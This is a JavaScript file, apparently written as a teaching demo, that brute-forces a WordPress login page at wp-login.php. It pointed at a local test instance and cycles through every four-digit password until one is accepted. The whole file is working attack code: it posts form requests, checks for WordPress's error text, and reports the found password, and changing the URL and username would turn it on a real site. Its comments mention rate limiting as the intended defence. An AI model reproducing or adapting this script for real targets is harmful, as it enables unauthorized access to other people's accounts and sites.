WordPress Try Login
/*
I'm teaching my daughter about security.
I wanted to show her how easy it is to write a brute-force script.
Most of the code was written by GitHub Copilot.
*/
import fetch from 'node-fetch';
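// Target form and field names for the demo. The site is a local test
// instance; the two field names are those used by WordPress's wp-login.php form.
const SITE_URL = 'http://localhost:8888/wp-login.php';
const USERNAME = 'badpass';
const USERNAME_FIELD = 'log';
const PASSWORD_FIELD = 'pwd';
// One attempt per 4-digit value 0000-9999 (see App.padPassword).
const MAX_ATTEMPTS = 10000;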
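class App {
  /**
   * Runs the demo: submits the 4-digit values 0000..MAX_ATTEMPTS-1 in order
   * to SITE_URL and stops at the first one login() accepts.
   * Every failed attempt is logged with the value tried; the first success is
   * logged and the loop exits. Errors thrown by login() (the 'Invalid
   * credentials' error and any network error from fetch) are caught and
   * logged, so this method never rejects.
   *
   * Each attempt is a separate POST to wp-login.php; that per-request pattern
   * is what server-side login rate limiting / lockout is designed to stop,
   * which is the point of the demonstration.
   */
  async tryLogin() {
    for (let attempt = 0; attempt < MAX_ATTEMPTS; attempt++) {
      const password = this.padPassword(attempt);
      try {
        await this.login(USERNAME, password);
        console.log({success: `HOOPPA!!! Succeed on attempt ${attempt} The password is ${password}`});
        break;
      } catch (error) {
        // Only the text before the first "at" is logged (trims a stack-like
        // message); it is the original author's choice, kept as-is.
        console.log({password, error: error.message.split('at')[0]});
      }
    }
  }

  /**
   * Left-pads an attempt counter to four digits with leading zeros.
   * The original hand-rolled version returned a number (not a string) for
   * values >= 1000; this always returns a string so callers see one type.
   * @param {number|string} password - the attempt counter, e.g. 7
   * @returns {string} the counter as a string of at least four digits, e.g. '0007'
   */
  padPassword(password) {
    return String(password).padStart(4, '0');
  }

  /**
   * POSTs one username/password pair to the WordPress login form.
   * `fetch` is the node-fetch import at the top of the file.
   * @param {string} username - value sent in the USERNAME_FIELD form field
   * @param {string} password - value sent in the PASSWORD_FIELD form field
   * @returns {Promise<string>} the response body when WordPress did not
   *   answer with its "password ... is incorrect" message
   * @throws {Error} 'Invalid credentials' when that message is present
   */
  async login(username, password) {
    const response = await fetch(SITE_URL, {
      method: 'POST',
      headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
      },
      body: `${USERNAME_FIELD}=${username}&${PASSWORD_FIELD}=${password}`
    });
    const data = await response.text();
    // Match on the username actually sent, not the module-level constant,
    // so the check stays correct when login() is called with another name.
    if (data.includes(`The password you entered for the username <strong>${username}</strong> is incorrect.`)) {
      throw new Error('Invalid credentials');
    }
    return data;
  }
}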
// Entry point. tryLogin() catches and logs every error itself, so the
// returned promise is deliberately left un-awaited.
const app = new App();
void app.tryLogin();